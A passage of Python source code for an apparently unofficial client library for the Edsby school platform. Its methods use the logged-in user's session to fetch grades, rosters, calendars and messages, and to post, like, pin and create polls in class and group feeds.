'no_scores_found': dict(), # Assignments that we haven't found scores for
'no_weights_found': list(), # Assignments we haven't found weights for
'no_columns_found': list(), # Assignments we haven't found columns for
'invalid_weighting': list(), # Assignments that have invalid weighting
'invalid_columns': list() # Assignments that have invalid columns
}
for nid in scores: # Populates assignmentData with NIDs and available assignment scores
if 'cols' in scores[nid]:
assignmentData['assignments'][nid] = {'score': scores[nid]['cols']['0']} if '0' in scores[nid]['cols'] else {'score': scores[nid]['cols']}
# Copy all available assignment metadata to assignmentData dict
for assg in metadata:
assignmentNID = str(metadata[assg]['nid'])
# Copy other keys from metadata obj to compiled assignment data obj
for key in metadata['r'+str(metadata[assg]['rid'])]:
if assignmentNID in assignmentData['assignments']: # If we've found metadata for an asssignment that we've also found scores for
assignmentData['assignments'][assignmentNID][key] = metadata[assg][key] # Copy metadata to that entry
else:
assignmentData['no_scores_found'][assignmentNID] = dict() # Otherwise, place this metadata in the no_scores_found dict
for meta in metadata[assg]:
assignmentData['no_scores_found'][assignmentNID][meta] = metadata[assg][meta]
# Copy weighting data, sort assignments without it, calculate percentage scores if possible
deepcopy_assignmentData = deepcopy(assignmentData)
for assg in deepcopy_assignmentData['assignments']:
assignmentNID = str(assg)
if 'scheme' not in assignmentData['assignments'][assg]:
del assignmentData['assignments'][assg]
continue
if 'weighting' in assignmentData['assignments'][assg]: # If weighting data is present in the metadata we retrieved
# API sometimes returns a dict, other times returns a JSON string. Figure out which one it is and parse appropriately.
if isinstance(assignmentData['assignments'][assg]['weighting'], dict): # If dict access weighting prop as a dict
if '0' in assignmentData['assignments'][assg]['weighting'] and not isinstance(assignmentData['assignments'][assg]['score'], dict):
assignmentData['assignments'][assignmentNID]['weighting'] = assignmentData['assignments'][assg]['weighting']['0']
elif len(assignmentData['assignments'][assg]['weighting']) is not len(assignmentData['assignments'][assg]['score']):
assignmentData['invalid_weighting'].append(assignmentNID)
else:
assignmentData['assignments'][assignmentNID]['weighting'] = assignmentData['assignments'][assg]['weighting']
elif isinstance(assignmentData['assignments'][assg]['weighting'], basestring): # If string access weighting prop as a dict after running through a JSON parser
weighting_dict = json.loads(assignmentData['assignments'][assg]['weighting'])
if '0' in weighting_dict and not isinstance(assignmentData['assignments'][assg]['score'], dict):
assignmentData['assignments'][assignmentNID]['weighting'] = json.loads(assignmentData['assignments'][assg]['weighting'])['0']
elif len(weighting_dict) is not len(assignmentData['assignments'][assg]['score']):
assignmentData['invalid_weighting'].append(assignmentNID)
else:
assignmentData['assignments'][assignmentNID]['weighting'] = weighting_dict
else:
assignmentData['no_weights_found'].append(assignmentNID) # No weighting data available for this entry, file it away
if 'columns' in assignmentData['assignments'][assg]: # If columns data is present in the metadata we retrieved
# API sometimes returns a dict, other times returns a JSON string. Figure out which one it is and parse appropriately.
if isinstance(assignmentData['assignments'][assg]['columns'], dict): # If dict access columns prop as a dict
if '0' in assignmentData['assignments'][assg]['columns'] and not isinstance(assignmentData['assignments'][assg]['score'], dict):
assignmentData['assignments'][assignmentNID]['columns'] = assignmentData['assignments'][assg]['columns']['0']
elif len(assignmentData['assignments'][assg]['columns']) is not len(assignmentData['assignments'][assg]['score']):
assignmentData['invalid_columns'].append(assignmentNID)
else:
assignmentData['assignments'][assignmentNID]['columns'] = assignmentData['assignments'][assg]['columns']
elif not isinstance(assignmentData['assignments'][assg]['columns'], dict) and assignmentData['assignments'][assg]['scheme'] != 'gs_4levelplusminus': # If string access columns prop as a dict after running through a JSON parser
columns_dict = json.loads(assignmentData['assignments'][assg]['columns'])
if '0' in columns_dict and not isinstance(assignmentData['assignments'][assg]['score'], dict):
assignmentData['assignments'][assignmentNID]['columns'] = json.loads(assignmentData['assignments'][assg]['columns'])['0']
elif len(columns_dict) is not len(assignmentData['assignments'][assg]['score']):
assignmentData['invalid_columns'].append(assignmentNID)
else:
assignmentData['assignments'][assignmentNID]['columns'] = columns_dict
else:
assignmentData['no_columns_found'].append(assignmentNID) # No columns data available for this entry, file it away
# Calculate score percentage for assignment
if 'columns' in assignmentData['assignments'][assg]: # If valid weighting data is present
if isinstance(assignmentData['assignments'][assg]['score'], (basestring, dict)) is False and 'columns' in assignmentData['assignments'][assg]: # If the score is NOT a letter grade or a multi-part grade (e.g. is numeric), calculate percentage score.
assignmentData['assignments'][assg]['scorePercentage'] = (float(assignmentData['assignments'][assg]['score'])/float(assignmentData['assignments'][assg]['columns'])) * 100
elif isinstance(assignmentData['assignments'][assg]['score'], dict):
if isinstance(assignmentData['assignments'][assg]['columns'], dict):
assignmentData['assignments'][assg]['scorePercentage'] = {}
for scoreType in assignmentData['assignments'][assg]['score'].keys():
if scoreType in assignmentData['assignments'][assg]['columns']:
assignmentData['assignments'][assg]['scorePercentage'][scoreType] = (float(assignmentData['assignments'][assg]['score'][scoreType])/float(assignmentData['assignments'][assg]['columns'][scoreType])) * 100
return assignmentData
"""
Returns a dict with a basic summary of assignments and their grades for a
given course (e.g "human name": "percentage")
"""
def getHumanReadableAssignmentSummary(self, classNID, classRID):
assignments = self.getClassAssignmentList(classNID, classRID)
humanList = dict()
for key in assignments['assignments']:
if 'scorePercentage' in assignments['assignments'][key]:
humanList[assignments['assignments'][key]['name']] = assignments['assignments'][key]['scorePercentage']
else:
humanList[assignments['assignments'][key]['name']] = assignments['assignments'][key]['score'].upper()
return humanList
"""
Retrieves raw, unformatted attendance records from the specified class. I haven't tried to
parse these yet.
"""
def getRawClassAttendanceRecords(self, classID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classID)+'?xds=MyWorkChart&student='+str(self.studentData['unid']),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['chartContainer']['chart']['attendanceRecords']['data']['right']['records']['incident']
"""
Returns a list of all member students of a class
Say hi to your classmates!
"""
def getClassmates(self, classNID):
classMates = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=ClassStudentList',cookies=self.getCookies(),headers=self.getHeaders()).json()
if 'slices' in classMates: # Make sure we got a valid response from the API.
if 'places' in classMates['slices'][0]['data'] and 'item' in classMates['slices'][0]['data']['places']:
return classMates['slices'][0]['data']['places']['item']
else:
return ''
"""
This function calls getCurrentClasses and adds all available roster information
from each class to it.
This is useful if you want roster information for only the current classes you're enrolled in.
"""
def getCurrentClassRosters(self):
rosterData = self.getCurrentClasses()
for NID in rosterData:
rosterData[NID]['classmates'] = self.getClassmates(NID)
return rosterData
"""
This function calls getAllClasses and adds all available roster information
from each class to it.
This is useful if you want historical roster information for ALL classes you've been enrolled in this year.
"""
def getAllClassRosters(self):
rosterData = self.getAllClasses()
for NID in rosterData:
rosterData[NID]['classmates'] = self.getClassmates(NID)
return rosterData
"""
Retrieves the feed of all assignments and messages posted in the feed of a given class NID.
"""
def getClassFeed(self, classNID):
feed = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=CourseFeed',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
return feed if 'item' in feed else ''
"""
Course calendar- returns calendar entries for the specified course.
"""
def getClassCalendar(self, classNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=CalendarPanel_Class',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Course assignment outline, shows upcoming and historical assignments for the course
"""
def getClassPlan(self, classNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(classNID)+'?xds=Course&_context=1',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['col1']['outline']['plan']['tree']
"""
Retrieves all current/pending notifications for the student
"""
def getStudentNotifications(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=notifications',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Returns all available calendar data (due/overdue assignments, events, schedules).
By default, returns data for the current month.
Call with a different date (formatted year-month-day) to get calendar data for that month.
"""
def getCalendarData(self, date=date.today().strftime("%Y-%m-%d")):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=Calendar&targetDate='+str(date),cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["caldata"]
"""
Get calendar entries for all upcoming due assignments
"""
def getCalendarDueAssignments(self):
return self.getCalendarData()['due']
"""
Get calendar entries for currently overdue assignments
"""
def getCalendarOverdueAssignments(self):
return self.getCalendarData()['overdue']
"""
Get all available calendar events
"""
def getCalendarEvents(self):
calendar = self.getCalendarData()
for key in list(calendar['common']):
if str(key + '.0') in list(calendar['events']):
calendar['common'][str(key)] = calendar['events'][str(key + '.0')]
return calendar['common']
"""
Returns calendar entries containing school scheduling information
"""
def getCalendarSchedules(self):
return self.getCalendarData()['schedules']
"""
Returns ALL direct Edsby messages from your inbox
"""
def getDirectMessages(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=Messages&_context=1',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["body"]["left"]["items"]["item"]
"""
Sends a direct message to a specified user
the message dict passed to this method should be structured like so:
{
'nodetype': 4.0,
'to': NID of user,
'text': message text,
'filedata': file data(?),
'files': more file data?
}
"""
def sendDirectMessage(self, message):
payload = {
'_formkey':self.studentData['formkey'],
'form-composeBody': str(message['text']),
'form-media-fill-addresources-integrations-integrationfiledata': message['filedata'],
'form-media-fill-addresources-integrations-integrationfiles': message['files'],
'nodetype': message['nodetype'],
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(message['to'])+'?xds=MessagesCompose&permaLinkKey=false&scopeState=true&_processed=true',data=payload,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to search for any higher level user (teacher, administrator)
whose name matches or contains a particular string
"""
def lookUpMessageRecipient(self, query):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['unid'])+'?xds=msgUserPicker&pattern='+query+'&noForm=true',cookies=self.getCookies(),headers=self.getHeaders()).json()["slices"][0]["data"]["item"]
"""
Edsby has a built-in website metadata scraper, which it uses to retrieve
various information about links before they're sent off.
{
"type": "link",
"code": 200,
"embedstatus": "complete",
"href": "<website URL>",
"thumbnail": "<website thumbnail>",
"title": "<website title>",
"description": "<meta description of website>"
}
"""
def scrapeURLMetadata(self, classNID, url):
return requests.get('https://'+self.edsbyHost+'/load/embed.json/'+str(classNID)+'?xds=bookMarkPreview&scrape='+requests.utils.quote(url),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Formats the website metadata from the site scraper, preparing it to be included in a message dict.
This dict should become the value of the url property for your message dict (which maps to the
social-shmart-url prop in the Edsby API call)
"""
def formatURLMetadata(self, metadata):
return {
"url": metadata['href'],
"type": metadata['type'],
"code": metadata['code'],
"href": metadata['href'],
"thumbnail": metadata['thumbnail'] if 'thumbnail' in metadata else '',
"title": metadata['title'] if 'title' in metadata else '',
"description": metadata['description'] if 'description' in metadata else '',
"uuid": 6,
"left": {
"thumbnail": metadata['thumbnail'] if 'thumbnail' in metadata else ''
},
"right": {
"title": metadata['title'] if 'title' in metadata else '',
"description": metadata['description'] if 'description' in metadata else ''
}
}
"""
Edsby expects the URL metadata passed in the message dict to be a string, so this method
retrieves the correct metadata, converts the dict to the proper format, and then returns
the formatted dict as a string.
"""
def getFormattedURLMetadataString(self, classNID, url):
metadata = self.scrapeURLMetadata(classNID, url)
return json.dumps(self.formatURLMetadata(metadata))
"""
Posts a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postMessageInClassFeed(self, classNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'?xds=CourseFeedMsg&xdsr=CourseFeed&rxdstype=ref&merge=merge',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'filedata': '',
'files': '',
}
"""
def editMessageInClassFeed(self, classNID, feedItemRID, feedItemNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=feedItemEdit&_i=2',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a reply to a message in the class feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 23,
'filedata': '',
'files': '',
'parent_nid': <parent feed item NID>,
'parent_rid': <parent feed item RID>
}
"""
def postReplyInClassFeed(self, classNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'body-pin': message['pin'], # 8
'body-shmart-nodetype': message['nodetype'], # 4
'body-shmart-nodesubtype': message['node_subtype'], # 23
'body-shmart-body': message['text'],
'body-shmart-url': message['url'],
'body-shmart-file-integrations-integrationfiledata': message['filedata'],
'body-shmart-file-integrations-integrationfiles': message['files'],
'replyTo': '',
'thread': message['parent_nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'/'+str(message['parent_rid'])+'/'+str(classNID)+'?xds=feedreply&xdsr=CourseFeed&__delegated=CourseFeed',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message with an accompanying file in the class feed. This takes a dict called message,
which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
TODO - Edsby complains of an invalid key when attempting to upload. Suspect form data formatting in POST.
"""
def postFileInClassFeed(self, classNID, message, fileName, filePath):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 10
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body': message['text'],
'social-shmart-url': message['url'],
'social-shmart-file-integrations-integrationfiledata': message['filedata'],
'social-shmart-file-integrations-integrationfiles': message['files']
}
postMetadata = requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'?xds=CourseFeedMsg&xdsr=CourseFeed&rxdstype=ref&merge=merge',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
parentRID = next(iter(postMetadata))
cookies = self.session.cookies.get_dict()
uploadData = {
'name': fileName,
'nodetype': '5.0',
'pin': '2',
'_formkey': self.studentData['formkey'],
}
for key in cookies:
uploadData[key] = cookies[key]
uploadData['files'] = (fileName, open(filePath, 'rb'))
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(classNID)+'/'+str(postMetadata[parentRID]['rid'])+'/'+str(postMetadata[parentRID]['nid'])+'?xds=MultiFileUploader',files=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Likes an item in the feed for a class
Call getClassFeed before this function to prevent errors
"""
def likeItemInFeed(self, classNID, feedItemNID, feedItemRID):
likeData = {
'likes': 1,
'_formkey': self.studentData['formkey'],
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=doLike',data=likeData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Unlikes an item in the feed for a class
Call getClassFeed before this function to prevent errors
"""
def unlikeItemInFeed(self, classNID, feedItemNID, feedItemRID):
likeData = {
'likes': None,
'_formkey': self.studentData['formkey']
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(classNID)+'/'+str(feedItemRID)+'/'+str(feedItemNID)+'?xds=doLike',data=likeData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Retrieves metadata about files attached to feed items, should they be present
If Edsby complains, call getClassFeed before using this function
"""
def getAttachmentMetadata(self, feedItemNID, attachmentNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(feedItemNID)+'/'+str(attachmentNID)+'?xds=AlbumFileView',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['contents']
"""
Generates the URL to download a particular file from Edsby, as such URLs are long and verbose.
Helper function to downloadAttachment. Useful if you want to handle file downloading in another
application (If you do, make sure you also take the session cookies with you).
"""
def getAttachmentDownloadURL(self, classNID, feedItemNID, feedItemRID, attachmentNID):
return 'https://'+self.edsbyHost+'/core/nodedl/classNID/'+str(feedItemRID)+'/'+str(feedItemNID)+'/'+str(feedItemRID)+'/'+str(attachmentNID)+'?field=file&attach=1&xds=fileThumbnail'
"""
Downloads an attachment from Edsby to the specified local path.
You could, for example, check a courses' feed at a regular interval, and then download
any new files attached to new posts.
"""
def downloadAttachment(self, classNID, feedItemNID, feedItemRID, attachmentNID, filePath):
self.getClassFeed(classNID) # Must call these before attempting to download, otherwise API denies access
self.getAttachmentMetadata(feedItemNID, feedItemRID) # Another prerequisite call
attachment = requests.get(self.getAttachmentDownloadURL(classNID, feedItemNID, feedItemRID, attachmentNID),cookies=self.getCookies(),headers=self.getHeaders(),stream=True)
with open(filePath, 'wb') as localFile:
for attachmentPart in attachment.iter_content(chunk_size=1024):
if attachmentPart:
localFile.write(attachmentPart)
return filePath
"""
Retrieves the 'Edsby River' of school news available to the current user.
"""
def getScrollingNews(self):
news = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=scrollingNews',cookies=self.getCookies(),headers=self.getHeaders()).json()
return news if 'item' in news['slices'][0]['data']['boxLayout']['newsbox'] else ''
"""
Retrieves the 'Recent Activity' section of the main Edsby page.
"""
def getBaseActivity(self, spage=0):
nids = [self.studentData['nid']]
nids.extend(self.getCurrentClassNIDList())
nids = '.'.join(str(e) for e in nids)
activity = requests.get('https://'+self.edsbyHost+'/core/multinode.json/'+nids+'?xds=BaseActivity&spage='+str(spage),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['messages']
return activity if 'item' in activity else ''
"""
Returns a dict of dicts containing groups the user is a part of in this format:
'r<group RID>': {
'summary': {
'about': {
'type': 1,
'name': "<group name>"
},
'name': "<group name>",
'info': {
'nposts': <number of posts>',
'nmembers': <number of members>
}
},
'nid': <group NID>,
'rid': <group RID>,
'nodetype': 3,
'pic': {
'profpic': '<group NID>'
},
'nodesubtype': 1
}
"""
def getStudentGroups(self):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(self.studentData['nid'])+'?xds=MyGroups&combine=true',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Helper to generate download URL for a given user's profile pic. Edsby itself returns a default profile pic if one does not exist.
"""
def getProfilePicDownloadURL(self, userNID, size=0):
if size > 0:
return 'https://'+self.edsbyHost+'/core/nodedl/'+str(userNID)+'?nodepic=true&field=file&xds=fileThumbnail&size='+str(size)+','+str(size)
else:
return 'https://' + self.edsbyHost + '/core/nodedl/' + str(userNID) + '?nodepic=true&field=file&xds=fileThumbnail'
"""
Returns schedule for user for current date, or for targetDate if one is provided.
targetDate must be formatted as YYYYMMDD.
"""
def getSchedule(self,targetDate=0):
if targetDate == 0:
schedule = requests.get('https://' + self.edsbyHost + '/core/node.json/' + str(self.studentData['unid']) + '?xds=CalendarPanelNav_Student',cookies=self.getCookies(), headers=self.getHeaders()).json()['slices'][0]['data']
if 'itemdata' in schedule:
return schedule['itemdata']
else:
return None
else:
schedule = requests.get('https://' + self.edsbyHost + '/core/node.json/' + str(self.studentData['unid']) + '?xds=CalendarPanelNav_Student&targetDate='+str(targetDate), cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
if 'itemdata' in schedule:
return schedule['itemdata']
else:
return None
"""
Returns the feed of all messages posted in the feed of a given group NID.
"""
def getGroupFeed(self, groupNID, spage=0):
feed = requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=PlaceFeed&spage='+str(spage),cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
return feed if 'item' in feed else ''
"""
Returns calendar entries for a specified group.
"""
def getGroupCalendar(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=CalendarPanel_Place',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Returns recent group members with last active date and time.
"""
def getGroupActiveList(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=GroupActiveList',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Returns all group members.
"""
def getFullGroupRoster(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=ConferenceMemberList',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']['places']['item']
"""
Returns poll data for a specified poll. The same info is returned in getClassFeed or getGroupFeed.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def getPollData(self, groupNID, pollNID, pollRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=FIBPoll',cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Returns all voters for a specified poll.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def getPollVoters(self, groupNID, pollNID, pollRID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=PollGetVoters',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]['data']
"""
Allows you to vote on items. Should work for classes to, though has only been tested with groups.
Call getGroupFeed or getClassFeed (as applicable) before this to prevent errors.
"""
def voteItemInFeed(self, groupNID, pollNID, pollRID, pollVote):
voteData = {
'vote': pollVote,
'_formkey': self.studentData['formkey'],
}
return requests.post('https://'+self.edsbyHost+'/core/node/'+str(groupNID)+'/'+str(pollRID)+'/'+str(pollNID)+'?xds=PollVote',data=voteData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to pin a message in a group.
Call getRawGroupData before this to prevent errors.
Untested in classes, theorize that it should work.
"""
def pinFeedItem(self, groupNID, feedItemRID):
pinData = {
'_formkey': self.studentData['formkey'],
'field': 1,
'rid': feedItemRID,
'value': 1,
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=pinData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Allows you to pin a message in a group.
Call getRawGroupData before this to prevent errors.
Untested in classes, theorize that it should work.
"""
def unpinFeedItem(self, groupNID, feedItemRID):
pinData = {
'_formkey': self.studentData['formkey'],
'field': 1,
'rid': feedItemRID,
'value': 0,
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=pinData,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a message in the group feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postMessageInGroupFeed(self, groupNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 8
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body-body': message['text'],
'social-shmart-url': message['url'],
'social-tools-addresources-integrations-integrationfiledata': message['filedata'],
'social-tools-addresources-integrations-integrationfiles': message['files']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=feedmsg&xdsr=PlaceFeed&rxdstype=ref&noDirtyForm=true',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Posts a message with an accompanying file in the group feed. This takes a dict called message,
which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 10,
'nodetype': 4,
'node_subtype': 0,
'filedata': '',
'files': '',
}
"""
def postFileInGroupFeed(self, groupNID, message, fileName, filePath):
uploadData = {
'_formkey': self.studentData['formkey'],
'name': fileName,
'nodetype': '5.9',
'pin': '2'
}
files=[('upload',(fileName,open(filePath,'rb'),'application/octet-stream'))]
response = requests.post('https://'+self.edsbyHost+'/core/create.json/tmp?xds=MultiFileUploaderNoThumbnailing&nodetype=5.9&temp=tmp',files=files, data=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
messageSubmission = {
'_formkey': self.studentData['formkey'],
'social-pin': message['pin'], # 10
'social-shmart-nodetype': message['nodetype'], # 4
'social-shmart-nodesubtype': message['node_subtype'], # 0
'social-shmart-body-body': message['text'],
'social-shmart-url': message['url'],
'social-tools-addresources-integrations-integrationfiledata': message['filedata'], # pin:2
'social-tools-addresources-integrations-integrationfiles': message['files'],
'social-tools-addresources-linkFiles': response['nid'],
'social-tools-addresources-linkRich': response['nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=feedmsg&xdsr=PlaceFeed&rxdstype=ref&noDirtyForm=true',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()['slice']['slices'][0]['data']['item']
"""
Deletes specified post in a group.
Works with top level posts and comments.
"""
def deletePostInGroupFeed(self, groupNID, postRID):
body = {
'_formkey': self.studentData['formkey'],
'field': 8,
'rid': postRID,
'value': 0
}
return requests.post('https://'+self.edsbyHost+'/core/putlink/'+str(groupNID)+'?xds=pin',data=body,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Returns raw data from a specified group.
"""
def getRawGroupData(self, groupNID):
return requests.get('https://'+self.edsbyHost+'/core/node.json/'+str(groupNID)+'?xds=Place',cookies=self.getCookies(),headers=self.getHeaders()).json()['slices'][0]
"""
Returns all moderators of a specified group.
"""
def getGroupModerators(self, groupNID):
return self.getRawGroupData(groupNID)['data']['col1']['moderators']
"""
Posts a poll in the group feed. This takes a dict called message, which looks like this:
{
"question": "Which fruit do you prefer?",
"choices": ["apples", "oranges"],
"showResults": ""
}
Set "showResults" to "1" for results to be publicly visible.
It can also post files with the poll, pass the fileName and filePath variables to do so.
"""
def postPollInGroupFeed(self, groupNID, pollData, fileName="", filePath=""):
choices = dict()
body = {
"_formkey": self.studentData['formkey'],
"poll-enum": str(choices),
"poll-question": str(pollData["question"]),
"showResults": str(pollData["showResults"]),
"file-linkFiles": "",
"file-linkRich": "",
"nodesubtype": 48,
"nodetype": 6,
"pin": "8",
"file-integrations-integrationfiledata": "pin:2",
"file-integrations-integrationfiles": ""
}
if len(fileName) > 0 and len(filePath) > 0:
uploadData = {
'_formkey': self.studentData['formkey'],
'name': fileName,
'nodetype': '5.9',
'pin': '2'
}
files=[('upload',(fileName,open(filePath,'rb'),'application/octet-stream'))]
response = requests.post('https://'+self.edsbyHost+'/core/create.json/tmp?xds=MultiFileUploaderNoThumbnailing&nodetype=5.9&temp=tmp',files=files, data=uploadData,cookies=self.getCookies(),headers=self.getHeaders()).json()
body.update({
"file-linkFiles": response['nid'],
"file-linkRich": response['nid']
})
else:
body.update({
"file-linkFiles": "",
"file-linkRich": ""
})
for i in range(0, len(pollData["choices"])):
body[str(i)] = str(pollData["choices"][i])
choices[str(i + 1)] = str(pollData["choices"][i])
body["poll-enum"] = str(json.dumps(choices))
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'?xds=CreatePoll&xdsr=PlaceFeed&rxdstype=ref&validate=poll',data=body, cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Posts a reply to a message in the group feed. This takes a dict called message, which looks like this:
{
'text': '<the message text>',
'url': '<an optional URL, shows up as a hyperlink in Edsby>',
'pin': 8,
'nodetype': 4,
'node_subtype': 23,
'filedata': '',
'files': '',
'parent_nid': <parent feed item NID>,
'parent_rid': <parent feed item RID>
}
"""
def postReplyInGroupFeed(self, groupNID, message):
messageSubmission = {
'_formkey': self.studentData['formkey'],
'body-pin': message['pin'], # 8
'body-shmart-nodetype': message['nodetype'], # 4
'body-shmart-nodesubtype': message['node_subtype'], # 23
'body-shmart-body-body': message['text'],
'body-shmart-url': message['url'],
'body-tools-addresources-integrations-integrationfiledata': message['filedata'],
'body-tools-addresources-integrations-integrationfiles': message['files'],
'replyToNode': message['parent_nid'],
'thread': message['parent_nid']
}
return requests.post('https://'+self.edsbyHost+'/core/create/'+str(groupNID)+'/'+str(message['parent_rid'])+'/'+str(groupNID)+'?xds=feedreply&xdsr=CourseFeed&__delegated=CourseFeed',data=messageSubmission,cookies=self.getCookies(),headers=self.getHeaders()).json()
"""
Invites a user to a group. Accepts group NID and a list of user NIDs.
"""
def inviteUsersToGroup(self, groupNID, usersNID):
body = {
"_dest": groupNID,
"_formkey": self.studentData['formkey'],
"pending": '1',
"body-members": usersNID
}
return requests.post('https://'+self.edsbyHost+'/core/link/'+str(usersNID.replace(",", "."))+'?xds=PlacesInvite&_processed=true',data=body, cookies=self.getCookies(),headers=self.getHeaders()).json()
class Error(Exception):
